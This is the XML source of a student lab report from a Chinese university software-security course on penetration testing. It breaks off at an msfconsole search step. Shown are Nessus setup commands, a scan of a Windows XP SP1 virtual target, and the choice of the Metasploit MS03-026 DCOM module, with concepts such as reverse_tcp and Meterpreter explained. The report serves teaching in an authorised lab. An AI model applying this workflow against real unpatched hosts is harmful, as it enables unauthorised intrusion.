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9D7930">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:b/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>天津大学</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7739A4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:b/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>智能与计算学部</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C77FBB6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:b/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>网络空间安全学院</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C45373"/>
    <w:p w14:paraId="29ABA566"/>
    <w:p w14:paraId="102D05B7"/>
    <w:p w14:paraId="763657A1"/>
    <w:p w14:paraId="79262F40"/>
    <w:p w14:paraId="0A63E12C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:b/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>《软件安全》实验报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64943FB3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>实验六：渗透测试实验</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBFCB86"/>
    <w:p w14:paraId="39715AA0"/>
    <w:p w14:paraId="52300BA4"/>
    <w:p w14:paraId="7658A9DB"/>
    <w:p w14:paraId="6CC3936B"/>
    <w:p w14:paraId="040B964C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>姓名：彭轩琛</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C16AC8B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>学号：3024206127</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C954EAA">
      <w:pPr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8"/>
        </w:rPr>
        <w:t>2026 年 6 月</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>25日</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7E6050">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7B357C">
      <w:pPr>
        <w:pStyle w:val="3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1. 实验环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4062FDD8">
      <w:pPr>
        <w:spacing w:after="80" w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="42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本实验在授权的教学实验环境中进行，测试主机为 Linux 环境，目标主机为 Windows XP 虚拟机。实验中使用 Nessus 对 Windows XP 目标主机进行漏洞扫描，使用 Metasploit Framework 对扫描发现的高危漏洞进行验证。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21F15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A9D8DA2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项目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5459A8CA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内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2B14E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ACC58F9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</w:rPr>
              <w:t>测试主机</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6236" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="338BE8F1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</w:rPr>
              <w:t>Linux 测试主机，IP 地址为 192.168.195.128，已运行 Metasploit 与 Nessus</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0549E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3D9A9D5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</w:rPr>
              <w:t>目标主机</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6236" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5456093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</w:rPr>
              <w:t>Windows XP SP1 靶机，IP 地址为 192.168.195.132</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="179DC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81A3969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</w:rPr>
              <w:t>网络环境</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6236" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="42712B40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</w:rPr>
              <w:t>192.168.195.0/24 虚拟实验网段，测试主机与靶机连通正常</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="12509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EC86A0A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</w:rPr>
              <w:t>主要工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6236" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="77CEC5B1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</w:rPr>
              <w:t>Metasploit Framework、Nessus、终端、浏览器</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="69691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FB3B66B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</w:rPr>
              <w:t>关键服务</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6236" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="23A4113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</w:rPr>
              <w:t>Nessus Web 服务 https://127.0.0.1:8834/；Metasploit msfconsole</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="61A4B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FDB0FA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</w:rPr>
              <w:t>验证漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6236" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0C0EE514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</w:rPr>
              <w:t>MS03-026 Microsoft RPC DCOM Interface Overflow</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="37FA4C83">
      <w:pPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F706B0C">
      <w:pPr>
        <w:pStyle w:val="3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2. 实验目的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70097BF1">
      <w:pPr>
        <w:spacing w:after="80" w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="42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理解渗透测试的定义、授权前提和基本流程，明确渗透测试与恶意攻击的区别。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CBFD6C">
      <w:pPr>
        <w:spacing w:after="80" w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="42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掌握 Nessus 漏洞扫描工具的基本使用方法，能够新建扫描任务并分析扫描结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21209DA9">
      <w:pPr>
        <w:spacing w:after="80" w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="42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掌握 Metasploit Framework 的基本使用方法，能够搜索、选择、配置和运行渗透测试模块。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AE0061">
      <w:pPr>
        <w:spacing w:after="80" w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="42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理解 RHOSTS、LHOST、RPORT、payload、target、exploit、session 等关键概念。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27299487">
      <w:pPr>
        <w:spacing w:after="80" w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="42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通过 Windows XP 测试机验证漏洞扫描结果与漏洞利用模块之间的对应关系。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CCF36D">
      <w:pPr>
        <w:spacing w:after="80" w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="42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理解 reverse_tcp、bind_tcp 和 Meterpreter 等常见载荷的基本含义。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7664440C">
      <w:pPr>
        <w:pStyle w:val="3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3. 实验原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CBC8E9">
      <w:pPr>
        <w:pStyle w:val="4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3.1 渗透测试基本概念</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1146DE18">
      <w:pPr>
        <w:spacing w:after="80" w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="42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渗透测试是一种在授权条件下进行的模拟攻击活动，目的是评估系统安全性。测试人员使用与攻击者相似的工具、技术和流程，对目标系统进行信息收集、漏洞扫描、漏洞验证和影响分析，从而发现系统存在的弱点，并为后续安全加固提供依据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179F6114">
      <w:pPr>
        <w:spacing w:after="80" w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="42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本实验的完整流程可以概括为：搭建测试环境，启动漏洞扫描工具，获取目标主机 IP 地址，使用 Nessus 扫描目标主机漏洞，根据扫描结果在 Metasploit 中搜索对应模块，设置目标地址和本机回连地址，启动利用模块，并观察是否成功获得目标主机的远程命令执行会话。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5619A41D">
      <w:pPr>
        <w:pStyle w:val="4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3.2 Metasploit 与 Nessus 的作用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422FBE2C">
      <w:pPr>
        <w:spacing w:after="80" w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="42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Metasploit 是开源渗透测试框架，提供了漏洞利用模块、攻击载荷、辅助模块和会话管理功能。实验中主要使用 msfconsole 交互式命令行界面，通过 search、use、show options、set、check 和 exploit 等命令完成模块选择与参数配置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C07CE3">
      <w:pPr>
        <w:spacing w:after="80" w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="42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Nessus 是漏洞扫描工具，能够对目标主机进行系统漏洞、弱口令、服务配置和补丁缺失等检测。本实验使用 Nessus 对 Windows XP 测试机进行扫描，并从扫描报告中选择高危漏洞作为后续 Metasploit 验证对象。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FA241D">
      <w:pPr>
        <w:pStyle w:val="4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3.3 Payload、reverse_tcp、bind_tcp 与 Meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B21B825">
      <w:pPr>
        <w:spacing w:after="80" w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="42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Payload 是漏洞触发后在目标系统上执行的载荷，用于建立命令行会话或更高级的远程控制通道。reverse_tcp 表示目标主机主动回连测试主机，因此需要设置 LHOST；bind_tcp 表示目标主机监听端口，测试主机主动连接目标，因此通常需要设置 RHOST。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549EEB2F">
      <w:pPr>
        <w:spacing w:after="80" w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="42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Meterpreter 是 Metasploit 中功能更强的高级载荷，成功执行后可以获得交互式 Meterpreter 会话。它支持信息收集、文件操作、系统信息查看等后渗透功能。本实验重点是理解其概念，不进行越权或超出实验范围的操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09721369">
      <w:pPr>
        <w:pStyle w:val="3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4. 实验步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350DAB1B">
      <w:pPr>
        <w:pStyle w:val="4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4.1 安装并启动 Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4570C99F">
      <w:pPr>
        <w:spacing w:after="80" w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>在 Linux 测试主机中启动 Metasploit Framework，进入 msfconsole 控制台。控制台成功加载数据库并出现 Metasploit 标识，说明渗透测试框架已可用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5929D843">
      <w:pPr>
        <w:spacing w:after="80" w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>启动完成后，终端进入 msfconsole 交互环境，后续模块搜索、参数配置和会话管理均在该控制台中完成。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D714559">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="80" w:after="0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486400" cy="345249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C705">
      <w:pPr>
        <w:keepLines/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>图 1  Metasploit Framework 启动成功并进入 msfconsole 环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452E04F0">
      <w:pPr>
        <w:pStyle w:val="4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4.2 安装并启动 Nessus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CEAD17">
      <w:pPr>
        <w:spacing w:after="80" w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>在 Linux 测试主机中安装并启动 Nessus 服务，随后通过本地 Web 管理页面进入扫描任务管理界面。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666FEC72">
      <w:pPr>
        <w:pStyle w:val="164"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
        <w:spacing w:before="60" w:after="120"/>
        <w:ind w:left="240" w:right="120"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># 安装 Nessus，本地文件名以实际下载的版本为准</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sudo apt install ./Nessus-10.3.0-ubuntu1404_amd64.deb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># 启动 Nessus 服务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sudo systemctl start nessusd.service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># 检查服务状态</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sudo systemctl status nessusd.service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DB9736">
      <w:pPr>
        <w:spacing w:after="80" w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Nessus 服务启动并完成初始化后，在 Web 管理页面创建并执行针对 Windows XP 靶机的漏洞扫描任务。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFC3120">
      <w:pPr>
        <w:pStyle w:val="4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4.3 准备 Windows XP 测试机并获取 IP 地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747407B4">
      <w:pPr>
        <w:spacing w:after="80" w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>启动 Windows XP 测试机，在命令提示符中执行 ipconfig 获取靶机 IPv4 地址。实验中获取到的目标地址为 192.168.195.132。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328AEA90">
      <w:pPr>
        <w:pStyle w:val="164"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
        <w:spacing w:before="60" w:after="120"/>
        <w:ind w:left="240" w:right="120"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Windows XP 测试机：ipconfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Linux 测试主机：ping 192.168.195.132</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1D57E2">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="80" w:after="0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029200" cy="3032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B52E">
      <w:pPr>
        <w:keepLines/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>图 2  Windows XP 靶机通过 ipconfig 获取地址 192.168.195.132</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788FB922">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="80" w:after="0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120640" cy="4208145"/>
            <wp:effectExtent l="0" t="0" r="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0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FB1A">
      <w:pPr>
        <w:keepLines/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>图 3  Linux 测试主机成功连通 Windows XP 靶机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3084BB1C">
      <w:pPr>
        <w:pStyle w:val="4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4.4 使用 Nessus 新建漏洞扫描任务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0685EC27">
      <w:pPr>
        <w:spacing w:after="80" w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>在 Nessus 中创建名为 sp1 scan 的按需漏洞扫描任务，扫描类型为 Vulnerability，目标设置为 Windows XP 靶机 192.168.195.132。扫描完成后进入任务结果页面查看漏洞分布。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287040E2">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="80" w:after="0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486400" cy="7543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91A4">
      <w:pPr>
        <w:keepLines/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>图 4  Nessus 中创建并执行 sp1 scan 漏洞扫描任务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABD39F7">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="80" w:after="0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03520" cy="305498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64FF">
      <w:pPr>
        <w:keepLines/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>图 5  Nessus 漏洞结果页显示 Critical 与 High 风险项</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D582729">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="80" w:after="0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03520" cy="20516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5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D71C">
      <w:pPr>
        <w:keepLines/>
        <w:spacing w:before="0" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>图 6  Nessus Hosts 页面显示靶机 192.1</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>68.195.132 的漏洞分布</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CCDBFB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BC29D0C">
      <w:pPr>
        <w:spacing w:after="80" w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>扫描结果显示该 Windows XP 靶机存在 Critical 和 High 风险漏洞项，说明目标系统存在可进一步验证的高危安全问题。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779991ED">
      <w:pPr>
        <w:pStyle w:val="4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4.5 根据 Nessus 结果选择验证漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDE1EA8">
      <w:pPr>
        <w:spacing w:after="80" w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>根据 Nessus 扫描结果选择 Microsoft RPC DCOM Interface Overflow（MS03-026）相关高危漏洞进行验证，并在 Metasploit 中使用对应模块 exploit/windows/dcerpc/ms03_026_dcom。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A3831F">
      <w:pPr>
        <w:spacing w:after="80" w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>本次验证的目标地址为 192.168.195.132，目标服务端口为 TCP/135；后续使用 Metasploit 的 MS03-026 DCOM 漏洞利用模块完成验证。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD5CBFE">
      <w:pPr>
        <w:pStyle w:val="4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4.6 在 Metasploit 中搜索并选择模块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB9782C">
      <w:pPr>
        <w:spacing w:after="80" w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>返回 msfconsole，使用 search ms03_026 搜索与扫描结果对应的漏洞利用模块。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285E473F">
      <w:pPr>
        <w:pStyle w:val="164"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
        <w:spacing w:before="60" w:after="80"/>
        <w:ind w:left="240" w:right="120"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="等线"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>msf6 &gt; search ms03_026</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="等线"/>
          <w:color w:val="auto"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
